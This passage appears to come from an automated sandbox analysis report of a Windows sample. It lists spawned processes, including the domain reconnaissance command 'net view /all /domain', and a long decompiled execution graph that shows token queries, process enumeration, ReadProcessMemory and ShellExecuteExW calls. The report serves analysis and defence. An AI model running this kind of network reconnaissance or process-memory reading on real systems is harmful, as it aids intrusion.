                                                                Wow64 process (32bit):false
                                                                Commandline:/c net view /all /domain
                                                                Imagebase:0x7ff6bec90000
                                                                File size:289'792 bytes
                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Has exited:false

                                                                General

                                                                Target ID:26
                                                                Start time:02:48:45
                                                                Start date:26/04/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff6d64d0000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Has exited:false

                                                                General

                                                                Target ID:27
                                                                Start time:02:48:45
                                                                Start date:26/04/2024
                                                                Path:C:\Windows\System32\net.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:net view /all /domain
                                                                Imagebase:0x7ff7786b0000
                                                                File size:59'904 bytes
                                                                MD5 hash:0BD94A338EEA5A4E1F2830AE326E6D19
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Has exited:false

                                                                Disassembly

                                                                Reset < >

                                                                  Execution Graph

                                                                  Execution Coverage:3.5%
                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                  Signature Coverage:16.7%
                                                                  Total number of Nodes:1130
                                                                  Total number of Limit Nodes:16
                                                                  execution_graph 33430 b43084 33431 b43090 __FrameHandler3::FrameUnwindToState 33430->33431 33456 b42de4 33431->33456 33433 b43097 33434 b431ea 33433->33434 33445 b430c1 ___scrt_is_nonwritable_in_current_image __FrameHandler3::FrameUnwindToState ___scrt_release_startup_lock 33433->33445 33490 b433a8 4 API calls 2 library calls 33434->33490 33436 b431f1 33491 b52ed9 23 API calls __FrameHandler3::FrameUnwindToState 33436->33491 33438 b431f7 33492 b52e9d 23 API calls __FrameHandler3::FrameUnwindToState 33438->33492 33440 b431ff 33441 b430e0 33442 b43161 33467 b434c3 GetStartupInfoW codecvt 33442->33467 33444 b43167 33468 b2cdb0 GetCommandLineW 33444->33468 33445->33441 33445->33442 33489 b52eb3 41 API calls 4 library calls 33445->33489 33457 b42ded 33456->33457 33493 b435a9 IsProcessorFeaturePresent 33457->33493 33459 b42df9 33494 b458dc 10 API calls 2 library calls 33459->33494 33461 b42dfe 33462 b42e02 33461->33462 33495 b5393e 33461->33495 33462->33433 33465 b42e19 33465->33433 33467->33444 33469 b2cdf8 33468->33469 33560 b21f80 LocalAlloc 33469->33560 33471 b2ce09 33561 b269a0 33471->33561 33473 b2ce58 33474 b2ce69 33473->33474 33475 b2ce5c 33473->33475 33569 b2c6a0 LocalAlloc LocalAlloc 33474->33569 33651 b26600 98 API calls __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 33475->33651 33478 b2ce65 33480 b2ceb0 ExitProcess 33478->33480 33479 b2ce72 33570 b2c870 33479->33570 33485 b2cea4 33653 b2cec0 LocalFree LocalFree 33485->33653 33486 b2ce9a 33652 b2cce0 CreateFileW SetFilePointer WriteFile CloseHandle 33486->33652 33489->33442 33490->33436 33491->33438 33492->33440 33493->33459 33494->33461 33499 b5bedb 33495->33499 33498 b458fb 7 API calls 2 library calls 33498->33462 33500 b5beeb 33499->33500 33501 b42e0b 33499->33501 33500->33501 33503 b56d2d 33500->33503 33501->33465 33501->33498 33504 b56d39 __FrameHandler3::FrameUnwindToState 33503->33504 33515 b51c9a EnterCriticalSection 33504->33515 33506 b56d40 33516 b5c4cc 33506->33516 33509 b56d5e 33531 b56d84 LeaveCriticalSection std::_Lockit::~_Lockit 33509->33531 33512 b56d59 33530 b56c7d GetStdHandle GetFileType 33512->33530 33513 b56d6f 33513->33500 33515->33506 33517 b5c4d8 __FrameHandler3::FrameUnwindToState 33516->33517 33518 b5c4e1 33517->33518 33519 b5c502 33517->33519 33540 b47370 14 API calls std::_Stofx_v2 33518->33540 33532 b51c9a EnterCriticalSection 33519->33532 33522 b5c4e6 33541 b47017 41 API calls collate 33522->33541 33523 b5c50e 33528 b5c53a 33523->33528 33533 b5c41c 33523->33533 33527 b56d4f 33527->33509 33529 b56bc7 44 API calls 33527->33529 33542 b5c561 LeaveCriticalSection std::_Lockit::~_Lockit 33528->33542 33529->33512 33530->33509 33531->33513 33532->33523 33543 b570bb 33533->33543 33535 b5c43b 33551 b553b8 33535->33551 33536 b5c42e 33536->33535 33550 b5776f 6 API calls std::_Lockit::_Lockit 33536->33550 33540->33522 33541->33527 33542->33527 33548 b570c8 std::_Locinfo::_W_Getmonths 33543->33548 33544 b57108 33558 b47370 14 API calls std::_Stofx_v2 33544->33558 33545 b570f3 RtlAllocateHeap 33547 b57106 33545->33547 33545->33548 33547->33536 33548->33544 33548->33545 33557 b5bf83 EnterCriticalSection LeaveCriticalSection std::_Locinfo::_W_Getmonths 33548->33557 33550->33536 33552 b553c3 HeapFree 33551->33552 33556 b553ed 33551->33556 33553 b553d8 GetLastError 33552->33553 33552->33556 33554 b553e5 __dosmaperr 33553->33554 33559 b47370 14 API calls std::_Stofx_v2 33554->33559 33556->33523 33557->33548 33558->33547 33559->33556 33560->33471 33562 b269f2 33561->33562 33563 b26a34 33562->33563 33566 b26a22 33562->33566 33564 b42937 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 33563->33564 33565 b26a42 33564->33565 33565->33473 33654 b42937 33566->33654 33568 b26a30 33568->33473 33569->33479 33571 b2c889 33570->33571 33576 b2cb32 33570->33576 33572 b2cb92 33571->33572 33571->33576 33662 b26250 14 API calls 33572->33662 33574 b2cba2 RegOpenKeyExW 33575 b2cbc0 RegQueryValueExW 33574->33575 33574->33576 33575->33576 33577 b26a50 33576->33577 33578 b26aa3 GetCurrentProcess OpenProcessToken 33577->33578 33579 b26a84 33577->33579 33583 b26b09 33578->33583 33584 b26adf 33578->33584 33580 b42937 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 33579->33580 33581 b26a9f 33580->33581 33581->33485 33581->33486 33663 b25de0 33583->33663 33586 b26b02 33584->33586 33587 b26af4 CloseHandle 33584->33587 33711 b257c0 GetCurrentProcess OpenProcessToken 33586->33711 33587->33586 33589 b26b20 33593 b21770 42 API calls 33589->33593 33590 b26b2e 33594 b26b32 33590->33594 33595 b26b3f 33590->33595 33592 b26c29 33596 b26ddb 33592->33596 33601 b26c43 33592->33601 33593->33584 33597 b21770 42 API calls 33594->33597 33666 b25f40 ConvertSidToStringSidW 33595->33666 33599 b22310 56 API calls 33596->33599 33597->33584 33602 b26e04 33599->33602 33716 b22310 33601->33716 33609 b246f0 52 API calls 33602->33609 33650 b26d8a 33602->33650 33605 b26b85 33697 b22e60 33605->33697 33621 b26e29 33609->33621 33612 b26e59 33615 b22310 56 API calls 33612->33615 33614 b22e60 42 API calls 33616 b26bf5 33614->33616 33617 b26e68 33615->33617 33703 b21770 33616->33703 33628 b246f0 52 API calls 33617->33628 33617->33650 33618 b26cad 33620 b22310 56 API calls 33618->33620 33624 b26cc7 33620->33624 33621->33612 33800 b24ac0 42 API calls 3 library calls 33621->33800 33630 b246f0 52 API calls 33624->33630 33624->33650 33625 b26c7c 33625->33618 33797 b24ac0 42 API calls 3 library calls 33625->33797 33626 b26c16 FindCloseChangeNotification 33626->33586 33632 b26e8a 33628->33632 33629 b26eb9 33631 b22310 56 API calls 33629->33631 33638 b26ce9 33630->33638 33633 b26ec4 33631->33633 33632->33629 33801 b24ac0 42 API calls 3 library calls 33632->33801 33640 b246f0 52 API calls 33633->33640 33633->33650 33634 b26d19 33635 b22310 56 API calls 33634->33635 33637 b26d24 33635->33637 33642 b246f0 52 API calls 33637->33642 33637->33650 33638->33634 33798 b24ac0 42 API calls 3 library calls 33638->33798 33644 b26ee6 33640->33644 33641 b26f10 33803 b252f0 33641->33803 33648 b26d46 33642->33648 33644->33641 33802 b24ac0 42 API calls 3 library calls 33644->33802 33645 b26d70 33751 b24ba0 33645->33751 33648->33645 33799 b24ac0 42 API calls 3 library calls 33648->33799 33850 b211d0 RaiseException CallUnexpected 33650->33850 33651->33478 33652->33485 33653->33480 33655 b42940 IsProcessorFeaturePresent 33654->33655 33656 b4293f 33654->33656 33658 b429a5 33655->33658 33656->33568 33661 b42968 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 33658->33661 33660 b42a88 33660->33568 33661->33660 33662->33574 33851 b25e40 GetTokenInformation 33663->33851 33667 b25fd2 33666->33667 33669 b25fac 33666->33669 33668 b224c0 47 API calls 33667->33668 33670 b25fc9 33668->33670 33671 b224c0 47 API calls 33669->33671 33672 b26003 33670->33672 33673 b25ff5 LocalFree 33670->33673 33671->33670 33674 b224c0 33672->33674 33673->33672 33679 b224d1 codecvt 33674->33679 33680 b224fd 33674->33680 33675 b225f5 33862 b22770 42 API calls 33675->33862 33677 b22515 33682 b225f0 33677->33682 33683 b22566 LocalAlloc 33677->33683 33678 b225fa 33863 b47027 41 API calls 2 library calls 33678->33863 33679->33605 33680->33675 33680->33677 33680->33682 33686 b22582 33680->33686 33861 b22d70 RaiseException CallUnexpected 33682->33861 33683->33678 33684 b22577 33683->33684 33694 b22593 codecvt 33684->33694 33688 b22586 LocalAlloc 33686->33688 33686->33694 33688->33694 33693 b225e5 33693->33605 33694->33678 33694->33693 33695 b225d8 33694->33695 33695->33693 33696 b225de LocalFree 33695->33696 33696->33693 33698 b22eb7 33697->33698 33699 b22e8d 33697->33699 33698->33614 33699->33697 33700 b22eaa 33699->33700 33864 b47027 41 API calls 2 library calls 33699->33864 33700->33698 33701 b22eb0 LocalFree 33700->33701 33701->33698 33704 b2179b 33703->33704 33708 b217c1 33703->33708 33705 b217ba LocalFree 33704->33705 33706 b217b4 33704->33706 33707 b217e5 33704->33707 33705->33708 33706->33705 33706->33708 33865 b47027 41 API calls 2 library calls 33707->33865 33708->33586 33708->33626 33712 b257e1 33711->33712 33713 b257e7 GetTokenInformation 33711->33713 33712->33592 33714 b25816 33713->33714 33715 b2581e CloseHandle 33713->33715 33714->33715 33715->33592 33717 b22348 33716->33717 33729 b2239c 33716->33729 33866 b42c98 6 API calls 33717->33866 33720 b22352 33722 b2235e GetProcessHeap 33720->33722 33720->33729 33721 b223b6 33730 b22427 33721->33730 33870 b42faa 44 API calls 33721->33870 33867 b42faa 44 API calls 33722->33867 33725 b2238b 33868 b42c4e EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 33725->33868 33726 b22416 33871 b42c4e EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 33726->33871 33729->33730 33869 b42c98 6 API calls 33729->33869 33730->33650 33731 b246f0 33730->33731 33732 b24700 33731->33732 33733 b24766 33731->33733 33732->33733 33872 b2d156 RaiseException EnterCriticalSection LeaveCriticalSection EnterCriticalSection LeaveCriticalSection 33732->33872 33733->33625 33735 b24730 FindResourceExW 33738 b2471a 33735->33738 33738->33733 33738->33735 33739 b24771 33738->33739 33873 b245b0 LoadResource LockResource SizeofResource 33738->33873 33874 b2d156 RaiseException EnterCriticalSection LeaveCriticalSection EnterCriticalSection LeaveCriticalSection 33738->33874 33739->33733 33740 b24775 FindResourceW 33739->33740 33740->33733 33741 b24783 33740->33741 33875 b245b0 LoadResource LockResource SizeofResource 33741->33875 33743 b24790 33743->33733 33876 b47383 41 API calls 3 library calls 33743->33876 33745 b247d1 33877 b24650 RaiseException 33745->33877 33747 b247d7 33748 b247e2 33747->33748 33878 b211d0 RaiseException CallUnexpected 33747->33878 33748->33625 33752 b257c0 4 API calls 33751->33752 33753 b24bed 33752->33753 33754 b24bf3 33753->33754 33755 b24c15 CoInitialize CoCreateInstance 33753->33755 33756 b252f0 89 API calls 33754->33756 33757 b24c58 VariantInit 33755->33757 33758 b24c4f 33755->33758 33759 b24c0d 33756->33759 33760 b24c9e 33757->33760 33758->33759 33763 b25187 CoUninitialize 33758->33763 33762 b42937 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 33759->33762 33761 b24cb1 IUnknown_QueryService 33760->33761 33771 b24ca8 VariantClear 33760->33771 33766 b24ce0 33761->33766 33761->33771 33764 b251a7 33762->33764 33763->33759 33764->33650 33767 b24d31 IUnknown_QueryInterface_Proxy 33766->33767 33766->33771 33768 b24d5a 33767->33768 33767->33771 33769 b24d7f IUnknown_QueryInterface_Proxy 33768->33769 33768->33771 33770 b24da8 CoAllowSetForegroundWindow 33769->33770 33769->33771 33772 b24dc2 SysAllocString 33770->33772 33773 b24e28 SysAllocString 33770->33773 33771->33758 33776 b24df8 SysAllocString 33772->33776 33777 b24def 33772->33777 33773->33772 33775 b251b0 _com_issue_error 33773->33775 33928 b211d0 RaiseException CallUnexpected 33775->33928 33779 b24e3d VariantInit 33776->33779 33780 b24e1d 33776->33780 33777->33775 33777->33776 33792 b24ebd 33779->33792 33780->33775 33780->33779 33782 b24ec1 VariantClear VariantClear VariantClear VariantClear SysFreeString 33782->33771 33784 b224c0 47 API calls 33784->33792 33787 b22e60 42 API calls 33787->33792 33788 b24fd5 OpenProcess WaitForSingleObject 33791 b2500b GetExitCodeProcess 33788->33791 33788->33792 33789 b24fc5 33789->33788 33926 b24270 10 API calls 33789->33926 33791->33792 33792->33782 33792->33784 33792->33787 33792->33788 33792->33789 33793 b25025 CloseHandle 33792->33793 33794 b251ab 33792->33794 33795 b2506e LocalFree 33792->33795 33879 b212f0 33792->33879 33903 b23860 CreateToolhelp32Snapshot 33792->33903 33793->33792 33927 b47027 41 API calls 2 library calls 33794->33927 33795->33792 33797->33618 33798->33634 33799->33645 33800->33612 33801->33629 33802->33641 33804 b25361 33803->33804 34687 b25d30 33804->34687 33806 b2537b 33807 b25d30 41 API calls 33806->33807 33808 b2538b 33807->33808 34691 b259c0 33808->34691 33810 b257b0 34710 b211d0 RaiseException CallUnexpected 33810->34710 33812 b2539b 33812->33810 34699 b47852 33812->34699 33816 b253e1 33817 b25d30 41 API calls 33816->33817 33834 b253f5 33817->33834 33818 b254cc 33819 b2551d GetForegroundWindow 33818->33819 33840 b25529 33818->33840 33819->33840 33820 b255f7 ShellExecuteExW 33821 b25612 33820->33821 33822 b25609 33820->33822 33825 b25646 33821->33825 33826 b25625 ShellExecuteExW 33821->33826 34708 b25890 6 API calls 33822->34708 33823 b25493 GetWindowsDirectoryW 34706 b25b10 70 API calls 33823->34706 33832 b2566c GetModuleHandleW GetProcAddress 33825->33832 33833 b256fd 33825->33833 33826->33825 33829 b2563d 33826->33829 33828 b254b4 34707 b25b10 70 API calls 33828->34707 34709 b25890 6 API calls 33829->34709 33838 b2568a AllowSetForegroundWindow 33832->33838 33835 b25721 33833->33835 33836 b2570e WaitForSingleObject GetExitCodeProcess 33833->33836 33834->33818 33834->33823 34702 b25940 33835->34702 33836->33835 33838->33833 33839 b25698 33838->33839 33839->33833 33841 b256a1 GetModuleHandleW GetProcAddress 33839->33841 33840->33820 33842 b256b4 33841->33842 33843 b256fa 33841->33843 33847 b256c8 Sleep EnumWindows 33842->33847 33848 b256ed 33842->33848 33843->33833 33845 b42937 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 33846 b257a8 33845->33846 33846->33650 33847->33842 33847->33848 34822 b25830 GetWindowThreadProcessId GetWindowLongW 33847->34822 33848->33843 33849 b256f3 BringWindowToTop 33848->33849 33849->33843 33852 b25e18 33851->33852 33853 b25ebe GetLastError 33851->33853 33852->33589 33852->33590 33853->33852 33854 b25ec9 33853->33854 33855 b25f0e GetTokenInformation 33854->33855 33856 b25ee9 33854->33856 33858 b25ed9 codecvt 33854->33858 33855->33852 33860 b260d0 45 API calls 2 library calls 33856->33860 33858->33855 33859 b25ef2 33859->33855 33860->33859 33866->33720 33867->33725 33868->33729 33869->33721 33870->33726 33871->33730 33872->33738 33873->33738 33874->33738 33875->33743 33876->33745 33877->33747 33929 b21480 5 API calls 2 library calls 33879->33929 33881 b2135f 33882 b21368 33881->33882 33883 b2141c 33881->33883 33885 b21451 33882->33885 33886 b213a6 33882->33886 33884 b2141a 33883->33884 33889 b224c0 47 API calls 33883->33889 33887 b42937 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 33884->33887 33930 b21a60 42 API calls 33885->33930 33891 b224c0 47 API calls 33886->33891 33890 b2144d 33887->33890 33889->33884 33890->33792 33892 b213c6 33891->33892 33894 b213db 33892->33894 33895 b22e60 42 API calls 33892->33895 33898 b22e60 42 API calls 33894->33898 33895->33894 33898->33884 33904 b238e7 CloseHandle 33903->33904 33905 b2393e codecvt 33903->33905 33906 b23925 33904->33906 33907 b23afd 33904->33907 33908 b2394e Process32FirstW 33905->33908 33906->33907 33909 b42937 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 33907->33909 33910 b23ab0 33908->33910 33920 b2396d 33908->33920 33911 b23b49 33909->33911 33910->33907 33912 b23aef CloseHandle 33910->33912 33911->33792 33912->33907 33913 b23970 OpenProcess 33913->33920 33914 b23a8e FindCloseChangeNotification 33916 b23a9b Process32NextW 33914->33916 33916->33910 33916->33913 33917 b224c0 47 API calls 33917->33920 33918 b23b51 33961 b2d305 RaiseException CallUnexpected 33918->33961 33920->33913 33920->33914 33920->33916 33920->33917 33920->33918 33922 b22e60 42 API calls 33920->33922 33923 b23a68 33920->33923 33931 b23c20 33920->33931 33956 b244a0 33920->33956 33922->33920 33923->33920 33960 b240b0 69 API calls 3 library calls 33923->33960 33926->33789 33929->33881 33962 b236d0 GetSystemDirectoryW 33931->33962 33934 b23ca2 GetProcAddress 33936 b23cb6 NtQueryInformationProcess 33934->33936 33937 b23f34 GetLastError 33934->33937 33935 b23d13 33938 b23f8b 33935->33938 33939 b23f7b FreeLibrary 33935->33939 33936->33935 33941 b23cd6 codecvt 33936->33941 33937->33935 33940 b42937 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 33938->33940 33939->33938 33942 b23fa4 33940->33942 33943 b23ce9 ReadProcessMemory 33941->33943 33942->33920 33943->33935 33944 b23d5b codecvt 33943->33944 33945 b23d68 ReadProcessMemory 33944->33945 33945->33935 33946 b23db1 33945->33946 33946->33935 33948 b23e83 33946->33948 33949 b23e15 33946->33949 33947 b23e95 ReadProcessMemory 33951 b23ef2 33947->33951 33952 b23eda 33947->33952 33984 b21bd0 45 API calls 2 library calls 33948->33984 33949->33947 33954 b22e60 42 API calls 33951->33954 33953 b22e60 42 API calls 33952->33953 33953->33951 33955 b23f2f 33954->33955 33955->33937 33957 b244b4 33956->33957 33989 b28220 33957->33989 33960->33923 33963 b23743 33962->33963 33968 b237d2 33962->33968 33964 b22310 56 API calls 33963->33964 33963->33968 33967 b23753 33964->33967 33965 b23823 33969 b42937 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 33965->33969 33966 b2381a GetLastError 33966->33965 33970 b23851 33967->33970 33971 b2375d 33967->33971 33968->33965 33968->33966 33972 b23847 33969->33972 33988 b211d0 RaiseException CallUnexpected 33970->33988 33975 b246f0 52 API calls 33971->33975 33972->33934 33972->33935 33978 b23778 33975->33978 33976 b2379e 33986 b24500 42 API calls ___crtCompareStringW 33976->33986 33978->33976 33985 b24ac0 42 API calls 3 library calls 33978->33985 33979 b237b1 33987 b24500 42 API calls ___crtCompareStringW 33979->33987 33982 b237c0 _wcschr 33982->33968 33983 b237d6 LoadLibraryExW 33982->33983 33983->33968 33984->33947 33985->33976 33986->33979 33987->33982 33996 b29910 33989->33996 33991 b28253 33992 b244cf 33991->33992 33995 b282a9 33991->33995 33992->33920 33993 b28610 73 API calls std::locale::_Locimp::_Makeushloc 33993->33995 33994 b28313 33994->33992 33995->33991 33995->33993 33995->33994 34017 b30df9 33996->34017 33998 b29942 34023 b29730 33998->34023 34000 b29991 34001 b299c5 34000->34001 34002 b299ba 34000->34002 34004 b299f5 34000->34004 34003 b42937 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 34001->34003 34002->34001 34005 b299be LocalFree 34002->34005 34006 b299ef 34003->34006 34059 b47027 41 API calls 2 library calls 34004->34059 34005->34001 34006->33991 34060 b26330 LocalAlloc 34017->34060 34019 b30e04 34020 b30e18 34019->34020 34061 b30b7c 14 API calls std::_Locinfo::_Locinfo_ctor 34019->34061 34020->33998 34022 b30e16 34022->33998 34062 b30c94 34023->34062 34025 b29768 34074 b30ed6 34025->34074 34031 b30df9 std::locale::_Init 15 API calls 34032 b29942 34031->34032 34035 b29730 93 API calls 34032->34035 34037 b29991 34035->34037 34039 b299c5 34037->34039 34042 b299ba 34037->34042 34045 b299f5 34037->34045 34038 b298c3 34040 b298d7 34038->34040 34159 b2d362 34038->34159 34043 b42937 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 34039->34043 34040->34000 34041 b2984f 34049 b29839 _Yarn codecvt 34041->34049 34164 b46c83 14 API calls ___free_lconv_mon 34041->34164 34042->34039 34046 b299be LocalFree 34042->34046 34047 b299ef 34043->34047 34166 b47027 41 API calls 2 library calls 34045->34166 34046->34039 34047->34000 34049->34049 34165 b29510 69 API calls 3 library calls 34049->34165 34060->34019 34061->34022 34063 b30ca0 __EH_prolog3 34062->34063 34064 b30ed6 std::_Lockit::_Lockit 7 API calls 34063->34064 34065 b30cab 34064->34065 34066 b30df9 std::locale::_Init 15 API calls 34065->34066 34073 b30cdc 34065->34073 34068 b30cbe 34066->34068 34174 b30e1c 43 API calls std::locale::_Setgloballocale 34068->34174 34069 b30d1c std::locale::_Locimp::_Locimp_Addfac 34069->34025 34071 b30cc6 34175 b29610 34071->34175 34167 b30f2e 34073->34167 34075 b30ee5 34074->34075 34076 b30eec 34074->34076 34179 b51cf9 6 API calls std::_Lockit::_Lockit 34075->34179 34078 b2978f 34076->34078 34180 b420e8 EnterCriticalSection 34076->34180 34078->34038 34080 b2f544 34078->34080 34181 b519d1 34080->34181 34083 b29610 std::_Locinfo::_Locinfo_ctor 14 API calls 34084 b2f568 34083->34084 34186 b2f49f 34084->34186 34086 b297f5 34086->34049 34087 b2f57a 34086->34087 34088 b2f586 __EH_prolog3 34087->34088 34089 b2f5cd 34088->34089 34653 b28c20 34088->34653 34090 b2f6ad 34089->34090 34094 b28c20 std::locale::_Locimp::_Makeushloc 9 API calls 34089->34094 34093 b2f737 34090->34093 34097 b28c20 std::locale::_Locimp::_Makeushloc 9 API calls 34090->34097 34206 b40116 34093->34206 34099 b2f5f7 34094->34099 34095 b2f5d2 34662 b29270 73 API calls 6 library calls 34095->34662 34096 b2f5a7 34659 b26330 LocalAlloc 34096->34659 34101 b2f70d 34097->34101 34103 b2f6b2 34099->34103 34104 b2f601 34099->34104 34108 b2f713 34101->34108 34109 b2f73c 34101->34109 34102 b2f75b 34312 b38e9a 34102->34312 34671 b2d752 72 API calls 7 library calls 34103->34671 34664 b26330 LocalAlloc 34104->34664 34107 b2f5ae 34114 b2f5c1 34107->34114 34660 b28fe0 41 API calls __Getctype 34107->34660 34677 b26330 LocalAlloc 34108->34677 34679 b2d6bd 72 API calls 7 library calls 34109->34679 34112 b2f5d8 34663 b2f3d9 10 API calls 5 library calls 34112->34663 34113 b2f6b8 34672 b2f3d9 10 API calls 5 library calls 34113->34672 34661 b2f3d9 10 API calls 5 library calls 34114->34661 34116 b2f766 34484 b38969 34116->34484 34117 b2f608 34665 b2f3d9 10 API calls 5 library calls 34117->34665 34122 b2f71a 34678 b2f3d9 10 API calls 5 library calls 34122->34678 34124 b2f742 34680 b2f3d9 10 API calls 5 library calls 34124->34680 34125 b2f5e0 34125->34089 34127 b2f6c0 34130 b28c20 std::locale::_Locimp::_Makeushloc 9 API calls 34127->34130 34128 b2f772 34134 b29610 std::_Locinfo::_Locinfo_ctor 14 API calls 34128->34134 34132 b2f6cd 34130->34132 34673 b2d7e7 72 API calls 7 library calls 34132->34673 34137 b2f78b std::locale::_Locimp::_Locimp_Addfac 34134->34137 34135 b2f625 34138 b28c20 std::locale::_Locimp::_Makeushloc 9 API calls 34135->34138 34137->34041 34140 b2f632 34138->34140 34139 b2f6d5 34674 b2f3d9 10 API calls 5 library calls 34139->34674 34666 b26330 LocalAlloc 34140->34666 34143 b2f6dd 34145 b28c20 std::locale::_Locimp::_Makeushloc 9 API calls 34143->34145 34144 b2f63b 34667 b2f3d9 10 API calls 5 library calls 34144->34667 34146 b2f6ea 34145->34146 34675 b2d87c 72 API calls 8 library calls 34146->34675 34149 b2f659 34151 b28c20 std::locale::_Locimp::_Makeushloc 9 API calls 34149->34151 34150 b2f6f2 34676 b2f3d9 10 API calls 5 library calls 34150->34676 34153 b2f666 34151->34153 34668 b26330 LocalAlloc 34153->34668 34155 b2f670 34156 b2f69b 34155->34156 34669 b2f098 42 API calls 5 library calls 34155->34669 34670 b2f3d9 10 API calls 5 library calls 34156->34670 34681 b2d28b 34159->34681 34163 b29909 34163->34031 34164->34049 34165->34038 34168 b51d07 34167->34168 34169 b30f38 34167->34169 34170 b51ce2 std::_Lockit::~_Lockit LeaveCriticalSection 34168->34170 34171 b30f4b 34169->34171 34173 b420f6 std::_Lockit::~_Lockit LeaveCriticalSection 34169->34173 34172 b51d0e 34170->34172 34171->34069 34172->34069 34173->34171 34174->34071 34176 b29640 34175->34176 34178 b2964a _Yarn codecvt 34175->34178 34177 b46c83 std::_Locinfo::_W_Getmonths 14 API calls 34176->34177 34176->34178 34177->34178 34178->34073 34179->34078 34180->34078 34182 b578ca std::_Lockit::_Lockit 5 API calls 34181->34182 34183 b519de 34182->34183 34184 b5177c std::_Locinfo::_Locinfo_ctor 68 API calls 34183->34184 34185 b2f550 34184->34185 34185->34083 34187 b2f4b1 34186->34187 34188 b2f539 34186->34188 34191 b2f4c3 34187->34191 34195 b2f4ca 34187->34195 34202 b2f4d6 34187->34202 34189 b2d362 std::_Locinfo::_Locinfo_Addcats 42 API calls 34188->34189 34190 b2f543 34189->34190 34192 b519d1 std::_Locinfo::_Locinfo_ctor 68 API calls 34190->34192 34193 b519d1 std::_Locinfo::_Locinfo_ctor 68 API calls 34191->34193 34194 b2f550 34192->34194 34193->34195 34201 b29610 std::_Locinfo::_Locinfo_ctor 14 API calls 34194->34201 34196 b29610 std::_Locinfo::_Locinfo_ctor 14 API calls 34195->34196 34198 b2f533 34195->34198 34196->34198 34197 b2f4f8 34200 b519d1 std::_Locinfo::_Locinfo_ctor 68 API calls 34197->34200 34198->34086 34199 b519d1 std::_Locinfo::_Locinfo_ctor 68 API calls 34199->34202 34200->34195 34203 b2f568 34201->34203 34202->34197 34202->34199 34204 b2f49f std::_Locinfo::_Locinfo_Addcats 69 API calls 34203->34204 34205 b2f574 34204->34205 34205->34086 34207 b40122 __EH_prolog3 34206->34207 34208 b3edf2 collate 74 API calls 34207->34208 34209 b4012b 34208->34209 34210 b28c20 std::locale::_Locimp::_Makeushloc 9 API calls 34209->34210 34247 b40185 34209->34247 34211 b4014b 34210->34211 34214 b4014f 34211->34214 34215 b4018a 34211->34215 34212 b28c20 std::locale::_Locimp::_Makeushloc 9 API calls 34216 b401ae 34212->34216 34213 b401d8 34217 b28c20 std::locale::_Locimp::_Makeushloc 9 API calls 34213->34217 34218 b40320 34213->34218 34219 b26330 std::locale::_Locimp::_Makeushloc LocalAlloc 34214->34219 34224 b3e843 std::locale::_Locimp::_Makeloc 74 API calls 34215->34224 34220 b401b4 34216->34220 34221 b401dd 34216->34221 34222 b40203 34217->34222 34223 b28c20 std::locale::_Locimp::_Makeushloc 9 API calls 34218->34223 34229 b4041d std::locale::_Locimp::_Locimp_Addfac 34218->34229 34232 b40159 34219->34232 34225 b26330 std::locale::_Locimp::_Makeushloc LocalAlloc 34220->34225 34230 b3e8d8 std::locale::_Locimp::_Makeloc 72 API calls 34221->34230 34226 b40325 34222->34226 34227 b4020d 34222->34227 34228 b403a2 34223->34228 34231 b40192 34224->34231 34234 b401bb 34225->34234 34238 b3e96d std::locale::_Locimp::_Makeloc 72 API calls 34226->34238 34235 b26330 std::locale::_Locimp::_Makeushloc LocalAlloc 34227->34235 34236 b40422 34228->34236 34237 b403a8 34228->34237 34229->34102 34239 b401e3 34230->34239 34240 b2f3d9 std::locale::_Locimp::_Locimp_Addfac 10 API calls 34231->34240 34233 b40171 34232->34233 34241 b42344 __Getcoll 41 API calls 34232->34241 34250 b2f3d9 std::locale::_Locimp::_Locimp_Addfac 10 API calls 34233->34250 34254 b2f3d9 std::locale::_Locimp::_Locimp_Addfac 10 API calls 34234->34254 34242 b40214 34235->34242 34244 b3ebc1 std::locale::_Locimp::_Makeloc 73 API calls 34236->34244 34243 b26330 std::locale::_Locimp::_Makeushloc LocalAlloc 34237->34243 34245 b4032b 34238->34245 34246 b2f3d9 std::locale::_Locimp::_Locimp_Addfac 10 API calls 34239->34246 34240->34247 34241->34233 34258 b2f3d9 std::locale::_Locimp::_Locimp_Addfac 10 API calls 34242->34258 34251 b403af 34243->34251 34248 b40428 34244->34248 34249 b2f3d9 std::locale::_Locimp::_Locimp_Addfac 10 API calls 34245->34249 34246->34213 34247->34212 34247->34213 34252 b2f3d9 std::locale::_Locimp::_Locimp_Addfac 10 API calls 34248->34252 34253 b40333 34249->34253 34250->34247 34255 b403c9 34251->34255 34259 b3eceb numpunct 44 API calls 34251->34259 34256 b40430 34252->34256 34257 b28c20 std::locale::_Locimp::_Makeushloc 9 API calls 34253->34257 34254->34213 34260 b2f3d9 std::locale::_Locimp::_Locimp_Addfac 10 API calls 34255->34260 34261 